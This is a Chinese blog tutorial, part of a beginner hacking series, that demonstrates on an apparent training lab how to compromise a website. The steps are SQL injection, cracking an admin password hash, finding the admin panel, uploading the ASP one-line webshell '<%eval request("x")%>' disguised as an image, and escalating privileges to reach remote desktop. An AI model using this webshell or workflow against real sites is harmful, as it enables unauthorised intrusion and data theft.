小白客带你走进黑客世界13之我是一个脚本小子
首先,大家先跟着我一起背诵三字经。
![](https://img.haomeiwen.com/i3885162/f348805bbf4c3f62.png)
![](https://img.haomeiwen.com/i3885162/fc3d7d68c7146429.png)
这是一篇在脚本小子的世界里流传的比较广的渗透三字经,也是拿下一个网站的基本思路。
何为脚本小子?一般来说,我们通常会把以“黑客”自居并沾沾自喜的初学者叫做脚本小子。脚本小子不像真正的黑客那样发现系统漏洞,他们通常使用别人开发的程序来恶意破坏他人系统。
通常的刻板印象为一位没有专科经验的少年,破坏无辜网站企图使得他的朋友感到惊讶。他们常常从某些网站上复制脚本代码,然后到处粘贴,却并不一定明白他们的方法与原理。他们钦慕于黑客的能力与探索精神,但与黑客所不同的是,脚本小子通常只是对计算机系统有基础了解与爱好,但并不注重程序语言、算法、和数据结构的研究,虽然这些对于真正的黑客来说是必须具备的素质。
![](https://img.haomeiwen.com/i3885162/1014b1772b73b956.png)
今天,小白带你入门脚本小子。文章开头一起朗读的三字经文不知道大家还有没有印象。一般来说,最简单的渗透流程就来自这三字经:找注入-爆账号-找后台-传小马-拿权限。其中,这个流程的每一个阶段都有代表性的利用工具,先提前和大家介绍一下。
0x01 找注入 && 0x02 爆账号
工具:啊D注入工具、椰树、Pangolin(穿山甲)、havij(胡萝卜)
0x03 找后台
工具:御剑后台扫描、wwwscan扫描器
0x04 传小马
工具:各种一句话木马、中国菜刀、中国蚁剑
0x05 拿权限
工具:pr提权工具、巴西烤肉提权工具
先不讲工具的原理这些废话,下面开始直接带你渗透一个网站。####
![](https://img.haomeiwen.com/i3885162/e7c6bc4e8c6eeee6.png)
由于小白手上没有对应的实验环境,转战i春秋,直接利用i春秋网站上提供的环境为大家来演示。
![](https://img.haomeiwen.com/i3885162/766b648ef06dbd8a.png)
![](https://img.haomeiwen.com/i3885162/f61016ffe25cee7a.png)
![](https://img.haomeiwen.com/i3885162/0e3224895a0db575.png)
演示开始##
Setup 1 找注入###
打开桌面上的火狐浏览器,出现如下图的页面
![](https://img.haomeiwen.com/i3885162/de957042cabe30c2.png)
什么都不要想,直接上啊D注入工具
![](https://img.haomeiwen.com/i3885162/488baba76ac805b3.png)
![](https://img.haomeiwen.com/i3885162/5c544799a2ac32c6.png)
![](https://img.haomeiwen.com/i3885162/e5a63dfce83f340b.png)
![](https://img.haomeiwen.com/i3885162/c2c474ecd504d9c2.png)
成功找到注入点,如下图所示。
![](https://img.haomeiwen.com/i3885162/8f74fd4d1db2dfc9.png)
Setup2 爆账号###
右键找到的注入点-注入检测
![](https://img.haomeiwen.com/i3885162/93fa7c3dd820a25d.png)
点击右上角的检测开始注入检测
![](https://img.haomeiwen.com/i3885162/07bcb9786219860b.png)
![](https://img.haomeiwen.com/i3885162/53909079bb0e4716.png)
![](https://img.haomeiwen.com/i3885162/7f6f335a14a3e382.png)
![](https://img.haomeiwen.com/i3885162/490b146f4e9a453c.png)
![](https://img.haomeiwen.com/i3885162/b61ddace74e09453.png)
最后得到网站的某个账号,用户名是linhai,密码为d7e15730ef9708c0。一般来说,数据库存放的密码应该是经过md5加密过的,怎么破?别慌!
![](https://img.haomeiwen.com/i3885162/0e778f9feeb7f28b.png)
解密MD5网站: http://www.dmd5.com/
![](https://img.haomeiwen.com/i3885162/741514280223fe50.png)
解密md5后得到密码值为linhai19760812
![](https://img.haomeiwen.com/i3885162/de64fce941813f84.png)
Setup3 找后台###
此步骤为找到网站的管理后台。来人啊,上工具。
![](https://img.haomeiwen.com/i3885162/17b0764e5972a975.png)
![](https://img.haomeiwen.com/i3885162/a903dd12820e04e1.png)
打开后开始扫描
![](https://img.haomeiwen.com/i3885162/bf3117656c32f7ba.png)
![](https://img.haomeiwen.com/i3885162/ba060299e89a2851.png)
接下来,访问扫描到的后台地址,登陆。
![](https://img.haomeiwen.com/i3885162/c6facbf79d114027.png)
![](https://img.haomeiwen.com/i3885162/0d3de796344de9a2.png)
直接登陆到网站的后台,到这里,是不是内心还伴随着一点小小的心动呢?
![](https://img.haomeiwen.com/i3885162/2f512b5a411e08e4.png)
Setup4 传小马###
由于是asp的站点,确定需要的是asp一句话木马,代码为
<%eval request("x")%>,密码为x
小白试了很多的上传点,比如这里:
![](https://img.haomeiwen.com/i3885162/fbcb867285fd63d3.png)
还有这里
![](https://img.haomeiwen.com/i3885162/20516ee23ea036e9.png)
这里
![](https://img.haomeiwen.com/i3885162/1055e13005aa3dcb.png)
这里
![](https://img.haomeiwen.com/i3885162/21d08531a01d9e8c.png)
![](https://img.haomeiwen.com/i3885162/807b66fe388ecb75.png)
但是!!!功夫不负有心人,还是让我找到了一个上传点。
![](https://img.haomeiwen.com/i3885162/9db070fb8de8bd95.png)
![](https://img.haomeiwen.com/i3885162/5fdbb58b456c801f.png)
于是乎新建一个txt文档,写上asp一句话<%eval request("x")%>,密码是x。并且把文件类型改成图片。也不要只写一行代码,不大不小,100行差不多。
![](https://img.haomeiwen.com/i3885162/c5869922db19b1a4.png)
然后上传
![](https://img.haomeiwen.com/i3885162/8d7b3096be413355.png)
![](https://img.haomeiwen.com/i3885162/3df430c53051c3e3.png)
![](https://img.haomeiwen.com/i3885162/4fd70f009f6d6041.png)
接下来的思路就是利用网站的数据库功能把我们上传的文件后缀由jpg改成asp
![](https://img.haomeiwen.com/i3885162/9344445120cd9e10.png)
![](https://img.haomeiwen.com/i3885162/ae08a1768740fc7a.png)
然后,拿出我们的菜刀,连接刚我们复制到根目录的xbk.asp文件(木马)
地址是:http://www.test.ichunqiu/xbk.asp,密码是x。
![](https://img.haomeiwen.com/i3885162/33dca18afab528ef.png)
在空白处 右键-添加 ,输入木马的地址和网站
![](https://img.haomeiwen.com/i3885162/4468d717de440f72.png)
![](https://img.haomeiwen.com/i3885162/09a395eee5481103.png)
![](https://img.haomeiwen.com/i3885162/e938ab584f0a6eea.png)
![](https://img.haomeiwen.com/i3885162/da1b9311833e5c8a.png)
![](https://img.haomeiwen.com/i3885162/b512b55ba7fa17b6.png)
Setup5 拿权限###
右键木马的地址,选择 虚拟终端
![](https://img.haomeiwen.com/i3885162/c15451081a1b27f5.png)
输入任意命令,发现没有权限,访问被拒绝
![](https://img.haomeiwen.com/i3885162/1f208f993f767894.png)
![](https://img.haomeiwen.com/i3885162/7028945bb7c63f25.png)
接下切换到回收站目录下,回收站是几个有限拥有执行权限的目录。
![](https://img.haomeiwen.com/i3885162/65396428cb6c8151.png)
分别找到我们的提权三件套:cmd.exe、pr.exe、3389.bat
![](https://img.haomeiwen.com/i3885162/8dcc342288e9f656.png)
![](https://img.haomeiwen.com/i3885162/899a32f5e577e841.png)
![](https://img.haomeiwen.com/i3885162/692a87f7aca34151.png)
接着,将三件套上传到回收站目录下面,如下图所示。
![](https://img.haomeiwen.com/i3885162/a1b29a7343e098fb.png)
接下来,进入我们上传的cmd.exe的虚拟终端,执行我们的提权三件套。
![](https://img.haomeiwen.com/i3885162/284e422c878eefc8.png)
![](https://img.haomeiwen.com/i3885162/31ecb48f814138f7.png)
![](https://img.haomeiwen.com/i3885162/637188d70f809bdf.png)
![](https://img.haomeiwen.com/i3885162/a5a10636331293b6.png)
执行完成之后,打远程连接,进入服务器。
![](https://img.haomeiwen.com/i3885162/1d483d327191e86c.png)
![](https://img.haomeiwen.com/i3885162/b9b0c8d587071996.png)
![](https://img.haomeiwen.com/i3885162/be00d654712d2104.png)
![](https://img.haomeiwen.com/i3885162/260f1e250a19536d.png)
![](https://img.haomeiwen.com/i3885162/8c7ae204b5b41f01.png)
至此,一个完整的渗透过程到此结束。
![](https://img.haomeiwen.com/i3885162/9c670fa126acab55.png)
Ps:喜欢的留个赞b( ̄▽ ̄)d ~也可以关注专题:黑客师。
![](https://img.haomeiwen.com/i3885162/5b36842d35495708.png)
下一篇文章:小白客带你走进黑客世界14之论kali渗透的艺术